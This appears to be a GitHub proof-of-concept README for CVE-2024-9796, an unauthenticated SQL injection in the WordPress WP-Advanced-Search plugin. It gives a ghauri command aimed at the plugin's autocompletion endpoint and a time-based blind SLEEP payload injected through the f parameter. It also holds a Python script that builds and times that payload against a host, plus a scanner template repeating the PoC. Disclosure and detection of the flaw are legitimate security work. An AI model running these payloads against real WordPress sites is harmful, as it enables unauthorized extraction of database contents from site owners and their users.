WordPress WP-Advanced-Search <= 3.3.9 - Unauthenticated SQL Injection

issamjr/CVE-2024-9796

CVE-2024-9796

WordPress WP-Advanced-Search <= 3.3.9 - Unauthenticated SQL Injection Vulnerability

Description

The WP-Advanced-Search plugin for WordPress (versions up to and including 3.3.9) is vulnerable to SQL injection. This vulnerability exists due to insufficient escaping of user-supplied parameters and lack of SQL query preparation. As a result, unauthenticated attackers can inject additional SQL queries into existing ones, potentially extracting sensitive information from the database.

Vulnerability Details

  • Type: Plugin
  • CVSS Score: 7.5 (High)
  • CVE: CVE-2024-9796
  • Plugin Slug: wp-advanced-search

Download Link

Download WP-Advanced-Search version 3.3.9 (the last affected release): https://downloads.wordpress.org/plugin/wp-advanced-search.3.3.9.zip

Proof of Concept (PoC)

Running ghauri against the autocompletion-PHP5.5.php endpoint, with the request parameters the plugin's autocompletion script expects (the f parameter is the injection point identified below):

ghauri -u "https://wpscan-vulnerability-test-bench.ddev.site/wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?t=wp_autosuggest&f=words&l=5&type=0&e=utf-8&q=c&limit=5&timestamp=19692269759899"

Payload Example

The following payload demonstrates a time-based blind SQL injection using the vulnerable f parameter:

Parameter: f (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (IF - comment)
Payload: t=wp_autosuggest&f=if(now()=sysdate(),SLEEP(9),0)-- wXyW&l=5&type=0&e=utf-8&q=c&limit=5&timestamp=13672261755853
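The following is an added example, not code from the issamjr/CVE-2024-9796 repository or from the WP-Advanced-Search plugin. It turns the ghauri finding above into a small, reproducible time-based blind check: it builds the PoC request with the SLEEP payload in the f parameter, measures the median latency of a benign request versus the payload request, and flags the endpoint only when the extra delay is a large fraction of the requested sleep. The lab hostname, sleep length, repeat count and detection margin are illustrative assumptions, and the two "server" functions are constructed stand-ins (one modelling the unpatched concatenated query, one modelling a query whose parameters are bound as data) so the block runs offline.

```python
# Added example: self-contained time-based blind SQL injection checker shaped
# like the ghauri finding on this page. NOT code from the issamjr/CVE-2024-9796
# repository or from the WP-Advanced-Search plugin.
# Assumptions (not in the advisory): the lab host, the sleep length, the
# repeat count and the detection margin are illustrative choices.
import re
import time
import urllib.request
from statistics import median
from typing import Callable
from urllib.parse import parse_qs, urlencode, urlparse

# Endpoint and parameter set taken from the PoC request on this page.
ENDPOINT = ("/wp-content/plugins/wp-advanced-search/class.inc/"
            "autocompletion/autocompletion-PHP5.5.php")
BASE_PARAMS = {
    "t": "wp_autosuggest", "f": "words", "l": "5", "type": "0",
    "e": "utf-8", "q": "c", "limit": "5", "timestamp": "19692269759899",
}


def build_url(base: str, f_value: str) -> str:
    """Assemble the PoC request with `f` replaced by f_value (URL-encoded)."""
    params = dict(BASE_PARAMS, f=f_value)
    return f"{base.rstrip('/')}{ENDPOINT}?{urlencode(params)}"


def sleep_payload(seconds: int, marker: str = "wXyW") -> str:
    """Same shape as the PoC payload: a MySQL IF() that sleeps, then a
    `-- ` comment (plus junk) that swallows the rest of the original query."""
    return f"if(now()=sysdate(),SLEEP({seconds}),0)-- {marker}"


def http_seconds(url: str, timeout: float = 30.0) -> float:
    """Real measurement: wall-clock seconds for one GET (for use against a lab host)."""
    t0 = time.perf_counter()
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        resp.read()
    return time.perf_counter() - t0


def is_time_based_injectable(base: str, measure: Callable[[str], float],
                             sleep_seconds: int = 5, repeats: int = 3,
                             margin: float = 0.8) -> bool:
    """Compare median latency of a benign request with that of the SLEEP
    payload. Medians over several repeats damp network jitter, and the
    endpoint is flagged only if the extra delay is at least `margin` of the
    requested sleep, so one slow response does not produce a false positive."""
    benign = median(measure(build_url(base, "words")) for _ in range(repeats))
    delayed = median(measure(build_url(base, sleep_payload(sleep_seconds)))
                     for _ in range(repeats))
    return delayed - benign >= margin * sleep_seconds


# --- Constructed stand-ins for a server so the example runs offline ---------
_SLEEP_RE = re.compile(r"SLEEP\((\d+)\)", re.IGNORECASE)


def vulnerable_server(url: str) -> float:
    """Models the unpatched behaviour described in the advisory: `f` is
    concatenated into the SQL text, so SLEEP(n) really delays the reply."""
    f_value = parse_qs(urlparse(url).query).get("f", [""])[0]
    m = _SLEEP_RE.search(f_value)
    return 0.05 + (int(m.group(1)) if m else 0)


def patched_server(url: str) -> float:
    """Models a fixed plugin: `f` is bound as data (e.g. via $wpdb->prepare),
    so its contents never reach the SQL parser and latency stays flat."""
    return 0.05


if __name__ == "__main__":
    lab = "https://wpscan-vulnerability-test-bench.ddev.site"  # host from the PoC
    print(build_url(lab, sleep_payload(9)))
    print("vulnerable model:", is_time_based_injectable(lab, vulnerable_server))
    print("patched model:", is_time_based_injectable(lab, patched_server))
```

To run it against a real lab instance, pass `http_seconds` as the `measure` argument instead of one of the simulated servers; keep `sleep_seconds` below the web server's request timeout, otherwise a timed-out response is indistinguishable from a successful sleep.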
Template

id: CVE-2024-9796

info:
  name: "WordPress WP-Advanced-Search <= 3.3.9 - Unauthenticated SQL Injection"
  author: "Issam Junior"
  severity: "high"
  metadata:
    verified: true
    max-request: 2

variables:
  cve: "CVE-2024-9796"
  plugin_name: "wp-advanced-search"
  plugin_version: "3.3.9"
  type: "plugin"
  description: |
    The WP-Advanced-Search plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 3.3.9.
    The vulnerability is caused by insufficient escaping of user-supplied parameters and a lack of proper preparation of the existing SQL query.
    This makes it possible for unauthenticated attackers to append arbitrary SQL queries to existing queries, potentially leading to the
    extraction of sensitive information from the database.
  download_link: "https://downloads.wordpress.org/plugin/wp-advanced-search.3.3.9.zip"
  cvss_score: 7.5

poc:
  - "ghauri -u \"https://wpscan-vulnerability-test-bench.ddev.site/wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?t=wp_autosuggest&f=words&l=5&type=0&e=utf-8&q=c&limit=5&timestamp=19692269759899\""
  - "Parameter: f (GET)"
  - "Type: time-based blind"
  - "Title: MySQL >= 5.0.12 time-based blind (IF - comment)"
  - "Payload: t=wp_autosuggest&f=if(now()=sysdate(),SLEEP(9),0)-- wXyW&l=5&type=0&e=utf-8&q=c&limit=5&timestamp=13672261755853"
